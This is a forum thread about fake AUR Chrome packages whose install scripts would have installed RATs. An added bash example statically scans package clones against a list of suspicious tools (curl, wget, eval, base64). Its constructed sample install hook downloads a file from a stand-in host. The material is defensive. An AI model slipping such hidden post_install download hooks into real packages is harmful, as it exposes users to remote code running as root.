More RATs found in AUR

Just a heads up–the same user responsible for the RATs in the fake firefox/librewolf/zen packages uploaded a couple more packages today with install scripts that would’ve installed RATs. One was “google-chrome-stable” and the other was “chrome-bin”. There might’ve been a third but I don’t remember seeing what it was called before it was pulled.

The malicious install scripts were hidden pretty sneakily as well so reading the pkgbuild for chrome-bin, it only appeared to pull from debian stable’s chrome. Just another reminder to not only read the pkgbuild but sources and everything else :slight_smile:

9 Likes
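
Added example, not part of the original thread: a static check of an AUR clone that shows which `.install` script the PKGBUILD references and flags lines worth reading in every file shipped beside it, without executing anything. The function names, the pattern list and the sample package (names and URLs) are assumptions constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example: static review of an AUR clone before running makepkg.
# It never sources the PKGBUILD, because sourcing would execute it.
# Heuristic patterns (an assumption): a hit means "read this line", not "malicious".
SUSPICIOUS='curl|wget|base64|eval|python[0-9.]* +-c|pip +install|git +clone|(ba)?sh +-c'

# Raw value of each install= line in the PKGBUILD, quotes stripped.
# pacman runs that file's post_install/post_upgrade hooks as root.
install_files() {
    sed -n 's/^[[:space:]]*install=//p' "$1/PKGBUILD" | tr -d "\"'"
}

# "file:line:text" for every suspicious line anywhere in the clone:
# PKGBUILD, .install scripts, patches and helper files shipped beside it.
review_clone() {
    grep -rnIwE --exclude-dir=.git "$SUSPICIOUS" "$1"
}

# Constructed sample clone: a PKGBUILD that only repackages a .deb, plus an
# install script that fetches something extra. All names and URLs are made up.
make_sample() {
    d=$(mktemp -d) || return 1
    cat > "$d/PKGBUILD" <<'EOF'
pkgname=example-bin
pkgver=1.0
pkgrel=1
arch=('x86_64')
source=("https://example.invalid/example_${pkgver}_amd64.deb")
sha256sums=('SKIP')
install="example-bin.install"
package() {
    bsdtar -xf data.tar.xz -C "$pkgdir"
}
EOF
    cat > "$d/example-bin.install" <<'EOF'
post_install() {
    curl -fsSL https://example.invalid/helper -o /tmp/helper
}
EOF
    echo "$d"
}

sample=$(make_sample)
echo "install script(s): $(install_files "$sample")"
review_clone "$sample"
rm -rf "$sample"
```

In the sample, the PKGBUILD produces no hits at all; the only flagged line is in the install script, which is the file a PKGBUILD-only read would miss.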

hard to believe there wasn’t already a chrome-bin in the AUR.

hard to believe they didn’t ban the ff/libre/zen guy the first time he did this

strange things afoot as Bill & Ted waxed

Strange things are indeed afoot at the Circle K

1 Like

I have never read any sources, or pkg builds, since I have used Linux. I guess I am livin on the edge :zany_face:

6 Likes

How easy is it to see if there is something strange in the pkgbuild? I’m not that familiar with that.

Source please.

2 Likes
2 Likes

Oh, sh*t.

At least with older packages already installed there’s a bit of “peace of mind” as stated in the article… I already tried to reduce usage of AUR packages, but for convenience… you know…

These evil, bored people are driving me nuts. Should take their energy and knowledge and fix bugs!

Isn’t google-chrome the original one, so I’m assuming google-chrome-stable was created with a new/random account?

From one of the comments of that article.

Arch is rubbish and it already lacks modern security features like selinux and besides that it would take a team of people likely years to fully take advantage of it since most people will never fully understand it and apparmor is basically doing nothing without more effort and additional steps which can also take some time without a team of people improving it for everyone. Arch has been last to adopt other security features over the years also. These rubbish packages that arch allows should just be dropped, removed and blocked from the distro since only trustworthy sources should be used and warning people about the dangers is not enough since people have no idea what is safe and will use the rubbish unsafe packages anyways.

I think he may have a point about Arch Linux and security, would be nice to have selinux support on Arch Linux. I tried it once but made my system unbootable because you also have to set up all the custom security policies to make it work. But I don’t think he understands AUR PKGBUILDs because he mentions that those packages should be dropped from Arch Linux.

1 Like

Anyone getting this error while trying to connect to Linuxiac website? It is showing that the SSL certificate of Linuxiac expired on July 20th.

Certificate chain
0 s:CN=linuxiac.com
i:C=US, O=Let’s Encrypt, CN=E6
a:PKEY: EC, (prime256v1); sigalg: ecdsa-with-SHA384
v:NotBefore: Jul 11 14:13:39 2025 GMT; NotAfter: Oct 9 14:13:38 2025 GMT
1 s:C=US, O=Let’s Encrypt, CN=E6
i:C=US, O=Internet Security Research Group, CN=ISRG Root X1
a:PKEY: EC, (secp384r1); sigalg: sha256WithRSAEncryption
v:NotBefore: Mar 13 00:00:00 2024 GMT; NotAfter: Mar 12 23:59:59 2027 GMT

It’s working OK here.

Are you using Firefox by any chance or some other browser?

Firefox

No, it’s running ok here with arkenfox

I don’t think people fully realise the AUR isn’t controlled, it’s open season for anyone to contribute.

No problem with Librewolf and Vivaldi.

The real problem here is that ultra-popular packages like Chrome have no business being in the AUR.

Why aren’t they officially packaged by Arch? I assume some stupid semi-legal reasons.

There is the voting system that ideally helps packages get promoted.

But yes, a lot of the popular AUR packages are there because they kinda have to be.

Just take a look at the highest voted ones and you will notice that with a few notable exceptions, like yay and octopi, that the vast majority of them are proprietary and/or do not allow redistribution, etc.